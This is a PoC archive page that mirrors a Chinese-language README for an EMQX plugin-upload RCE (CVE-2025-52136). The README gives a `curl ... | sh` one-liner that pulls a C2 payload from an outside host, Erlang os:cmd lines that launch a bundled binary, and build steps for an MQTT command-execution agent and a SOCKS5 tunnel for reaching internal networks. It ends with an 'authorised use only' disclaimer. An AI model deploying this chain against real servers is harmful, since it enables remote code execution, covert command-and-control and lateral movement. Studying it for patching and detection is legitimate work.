Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-52136 PoC — EMQX 代码问题漏洞

Source
Associated Vulnerability
Title: EMQX 代码问题漏洞 (CVE-2025-52136)
Description:In EMQX before 5.8.6, administrators can install arbitrary novel plugins via the Dashboard web interface. NOTE: the Supplier's position is that this is the intended behavior; however, 5.8.6 adds a defense-in-depth feature in which a plugin's acceptability (for later Dashboard installation) is set by the "emqx ctl plugins allow" CLI command.
Description
EMQX控制台不出网利用
Readme
# CVE-2025-52136
```
https://github.com/ricardojoserf/emqx-RCE
原利用方式通过上传emqx插件,在插件模板的代码中添加Erlang os模块调用系统命令执行RCE
```
出网环境,环境默认存在curl,可以直接通过`curl http://xx.xx.xx.xx/1.sh | sh`上线C2

目标不出网时,由于EMQX本身即为MQTT消息服务器,因此可以直接配合插件上传,在EMQX服务器执行上传的可执行程序
使用EMQX做MQTT消息队列核心,部署的程序直接作为一个“系统命令代理”,订阅客户端发送的命令,再把执行结果发布回主题。

## 设计思路
```lua
       +-------------+
       |   客户端     |
       | 发送命令消息 |
       | 主题: rx/cmd|
       +------+-------+
              |
           MQTT Broker (EMQX)
              |
       +------+-------+
       |  命令代理程序 |
       |  订阅 rx/cmd |
       |  执行系统命令 |
       |  发布 tx/cmd |
       +--------------+
```
## 编译使用
```
go mod init mqtt_agent
go get github.com/eclipse/paho.mqtt.golang
GOOS=linux GOARCH=amd64 go build -o mqtt_agent agent.go
```
随后利用原作者利用思路,`my_emqx_plugin.erl`添加三行
```
    os:cmd("mv /opt/emqx/plugins/my_emqx_plugin-1.0.0/my_emqx_plugin-0.1.0/mqtt_agent /tmp/mqtt_agent"),
    os:cmd("chmod +x /tmp/mqtt_agent"),
    os:cmd("bash -c \"/tmp/mqtt_agent\""),
```
编译完插件后,利用任意压缩工具将mqtt_agent放到`my_emqx_plugin-1.0.0.tar.gz\my_emqx_plugin-1.0.0\my_emqx_plugin-0.1.0\`目录即可

![tar.gz](https://github.com/f1r3K0/CVE-2025-52136/blob/main/png/ScreenShot1.png)

上传插件
![plugin](https://github.com/f1r3K0/CVE-2025-52136/blob/main/png/ScreenShot2.png)

随后在客户端将tx/cmd添加订阅,主题为rx/cmd,即可食用

![cmd](https://github.com/f1r3K0/CVE-2025-52136/blob/main/png/ScreenShot3.png)

## 代理隧道
同理,通过MQTT在 Client ↔ Agent 间可以开一个隧道,并把 TCP 数据双向透过 MQTT 转发给内网 Agent,再由 Agent 连接到内网目标主机即可实现利用内网穿透。

此方案存在一定缺陷:
1.MQTT 带宽与延迟
2.高并发连接

```
go mod init mqtt_tunnel_agent
go mod init mqtt_tunnel_client
go get github.com/armon/go-socks5
go get github.com/eclipse/paho.mqtt.golang
go get github.com/google/uuid

go build -o mqtt_tunnel_agent mqtt_tunnel_agent.go
//client
GOOS=linux GOARCH=amd64 go build -o mqtt_tunnel_client mqtt_tunnel_client.go

```
使用方式类似上述rce过程,这里直接起用本地端口做socks5隧道转发流量
### Agent端注意
- Agent 必须兼容自定义的topic与控制消息(open/ack/close、data/c2a、data/a2c)
- Agent 订阅 tunnel/+/+/ctrl 与 tunnel/+/+/data/c2a
- Agent publish 到 tunnel/{session}/{connID}/data/a2c 以及 .../ctrl 的 ack

代理隧道自行编译食用

## 注意
该工具仅适用于在授权环境/测试环境进行使用,严禁非法利用
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →